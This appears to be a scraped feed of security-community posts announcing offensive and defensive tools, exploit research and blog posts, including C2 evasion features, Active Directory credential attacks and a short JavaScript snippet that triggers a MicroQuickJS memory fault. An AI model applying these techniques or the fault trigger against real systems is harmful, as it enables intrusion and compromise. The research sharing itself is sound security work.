I'm pleased to announce @HyperDbg v0.19. This release introduces a new module, HyperTrace, which brings hypervisor-level integration w/ tracing technologies such as Last Branch Record (LBR) & Processor Trace (PT). LBR is now available, with more coming. github.com/HyperDbg/HyperDbg…

We think of WASM as a mechanism to run compiled code in your browser, but what if we shimmed in all the host APIs necessary to run full implants with ALL logic entirely in the WASM VM? This post walks through what that looks like. praetorian.com/blog/wasmforg… #wasm #malware #sliver

In macOS Tahoe 26.4 Apple added a new security feature to Terminal that warns users of potentially malicious pastes with a "Possible malware, Paste blocked" prompt. Here how it actually works 🧵

New blog: Using LLMs the right way for malware analysis 💡Tips for building an autonomous AI analysis lab on a 12 yo laptop and getting stuff done faster without loss of accuracy. blog.gdatasoftware.com/2026/…

DEMOSCENE > all.

Realtime code, handmade ascii animations and raw tracker music. The demo ’CMOS Cosmos’ by Razor 1911 in 2025 #demoscene #ascii #msdos

Update: Thanks to @RedTeamPT, I created a pull request for ntlmrelayx to reflect the new requirements: github.com/fortra/impacket/p… Now Shadow Creds are working again 😀

Two new roles for @badsectorlabs ludus: ludus_splunk: github.com/curi0usJack/ludus… ludus_splunk_universalforwarder: github.com/curi0usJack/ludus…

I've tried something new! I have streamed some unfiltered coding, writing a module to detect malicious bytes in a shellcode injection scenario for an EDR that would use the System Call Integrity Layer project: youtube.com/watch?v=gK4OXh6l… If this content is useful, or you like it, please let me know and give me some ideas what you would want to see! I want to grow in myself and help produce content that would be beneficial for our amazing cyber community! #blueteam #cybersecurity #redteam #driver #rust #rustlang #infosec #rustdriver #soc #cyber #cti #informationsecurity #infosec

When MicroQuickJS released, I spent 8.5 hours to summon an Exploit for it. Here is the Fault: var arr = new Array(30) var attack = { valueOf: function() { arr.length = 0 arr.length = 3 return 10 } } arr.splice(attack, 30) I document the full Ritual Process below

i made a browser extension

Let's play peekaboo with PatchGuard! Read our blog post about hiding processes on modern Windows systems with HVCI enabled: outflank.nl/blog/2026/01/07/…

🔥Introducing a new Red Team tool - SessionHop: github.com/3lp4tr0n/SessionH… SessionHop utilizes the IHxHelpPaneServer COM object to hijack specified user sessions. This session hijacking technique is an alternative to remote process injection or dumping LSASS. Kudos to @tiraniddo for first discovering this years ago. Blue Team tip: Look for unusual child processes spawning from HelpPane.exe

Reusing part of the ESC1-unPAC BOF code to create a ShadowCreds unPAC BOF 1. Write msDS-KeyCredentialLink attribute using obfuscated LDAP queries. 2. Authenticate to the KDC using PKINIT. 3. unPAC-the-hash. 4. Cleanup msDS-KeyCredentialLink. github.com/RayRRT/BOFs/tree/…

ProfileHound is a post-escalation tool to help find and achieve red-teaming objectives by locating domain user profiles on machines. It uses the BloodHound OpenGraph format to build a new edge called which determines if a user profile exists on a computer. This edge allows operators to make informed decisions about which computers to target for looting secrets. github.com/m4lwhere/profileh…

I've merged the first PR of 2026 for Wyrm, v0.7.2! This brings: - Spawn via Early Cascade Injection. - 'Wyrm Object Files (WOFs)' which allows the operator to extend the agent's capability via C/C /Rust/(probably even Zig) - currently only at compile time. Runtime WOFs will be released in due course. - The inject command for injecting Wyrm into another process. - AMSI bypass uses VEH^2 over amsi.dll patching. Perhaps I can split this out into a profile to allow the operator to choose which method they would like. - Refelctive DLL inherits ETW patching from your profile.toml. - C2 stability fixes. Thanks everyone for your support in 2025, lets make 2026 the year of the dragon 🐉 github.com/0xflux/Wyrm #redteam #blueteam #wyrm #pentesting #cyber #infosec #maldev #cybersecurity #pentest #tools #rust #rustlang

Using ADCS to Attack HTTPS-Enabled WSUS Clients: @cookieTheft and I have extended the research by @Coontzy1 on WSUS attacks and explored how to leverage misconfigured ADCS templates to gain code execution on HTTPS-enabled WSUS clients. 1/2🧵

I'm excited to finally share Chronomaly, a kernel exploit for Android and Linux kernels 5.10.x using CVE-2025-38352. As a reminder, please patch your Android devices if you haven't already! I recommend getting some 🍿 before reading this post 👀 All links in the thread below:

I HATE EXPLOIT DEVELOPMENT I HATE EXPLOIT DEVELOPMENT I HATE EXPLOIT DEVELOPMENT I HATE EXPLOIT DEVELOPMENT I HATE EXPLOIT DEVELOPMENT I HATE EXPLOIT DEVELOPMENT OMG ! IT WORKS, ZERO DAY I LOVE EXPLOIT DEVELOPMENT I LOVE EXPLOIT DEVELOPMENT I LOVE EXPLOIT DEVELOPMENT

I got interviewed on CTF Radiooo! youtu.be/v22IRBJWBQkn. Big thanks to hosts @adamdoupe and @Zardus for the opportunity & the fun chat!